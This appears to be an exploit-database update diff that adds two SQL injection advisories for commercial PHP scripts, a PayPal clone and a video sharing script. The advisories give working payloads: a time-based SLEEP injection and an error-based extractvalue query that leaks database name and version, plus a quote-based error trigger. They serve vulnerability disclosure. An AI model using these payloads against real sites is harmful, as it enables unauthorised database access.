DB: 2018-02-12

2 changes to exploits/shellcodes

Paypal Clone Script 1.0.9 - 'id' / 'acctype' SQL Injection
Readymade Video Sharing Script 3.2 - 'search' SQL Injection

exploits/php/webapps/44017.txt

@@ -0,0 +1,36 @@
+# Exploit Title: Paypal / Money Transfer Clone Script 1.0.9 - SQL Injection
+# Dork: N/A
+# Date: 2018-02-10
+# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com
+# Vendor Homepage:
+https://www.phpscriptsmall.com/product/paypal-money-transfer-clone/
+# Version: 1.0.9
+# Category: Webapps
+# CVE: N/A
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands.
+# # # # #
+# Proof of Concept :
+
+SQLI :
+
+http://localhost/PATH/registrationpersonal.php?id=[SQL]
+
+# Parameter : id (GET)
+#    Type: Type: AND/OR time-based blind
+#    Title: MySQL >= 5.0.50 AND time-based blind
+#    Payload: AND SLEEP(10)
+
+#########################################################
+
+http://localhost/PATH/registrationmail.php?acctype=[SQL]
+
+# Parameter : acctype (GET)
+#    Type : Error based
+#    Title : MySQL >= 5.0 AND error based - Extractvalue (XPATH query)
+#    Payload : 1' and
+extractvalue(1,/*!00000Concat(0x3a,database(),0x3a,0x3a,version())*/)%23
+
+# Description: First inject payload into parameter and load URL . then fill all fields and click "continue".
+# You will have version and db_name in the next page . You can find all tables using XPATH query and see result in the next page .

exploits/php/webapps/44018.txt

@@ -0,0 +1,23 @@
+##################################################################
+# Exploit Title: Readymade Video Sharing Script - SQL Injection (Error Based)
+# Google Dork: NA
+# Date: 10.02.2018
+# Exploit Author: Varun Bagaria
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: https://www.phpscriptsmall.com/product/php-video-sharing-script/ 
+# Version: 3.2
+# Tested on: Windows 7
+# Category: Webapps
+# CVE :  NA
+##################################################################
+
+Proof of Concept
+=================
+
+Attack Parameter : search
+Payload : '
+
+Reproduction Steps:
+------------------------------
+1. Access the website
+2. In the search bar insert ' and you will get error based SQL Injection

files_exploits.csv

@@ -38023,6 +38023,8 @@ id,file,description,date,author,type,platform,port
 44014,exploits/php/webapps/44014.txt,"Select Your College Script 2.0.2 - Authentication Bypass",2018-02-10,"Prasenjit Kanti Paul",webapps,php,
 44015,exploits/php/webapps/44015.txt,"Multi religion Responsive Matrimonial 4.7.2 - Cross-Site Scripting",2018-02-10,"Prasenjit Kanti Paul",webapps,php,
 44016,exploits/php/webapps/44016.txt,"Multi Language Olx Clone Script - Cross-Site Scripting",2018-02-10,"Varun Bagaria",webapps,php,
+44017,exploits/php/webapps/44017.txt,"Paypal Clone Script 1.0.9 - 'id' / 'acctype' SQL Injection",2018-02-11,L0RD,webapps,php,
+44018,exploits/php/webapps/44018.txt,"Readymade Video Sharing Script 3.2 - 'search' SQL Injection",2018-02-11,"Varun Bagaria",webapps,php,
 41641,exploits/php/webapps/41641.txt,"Joomla! Component JooCart 2.x - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php,
 41642,exploits/php/webapps/41642.txt,"Joomla! Component jCart for OpenCart 2.0 - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php,
 41644,exploits/php/webapps/41644.txt,"phplist 3.2.6 - SQL Injection",2017-03-20,"Curesec Research Team",webapps,php,80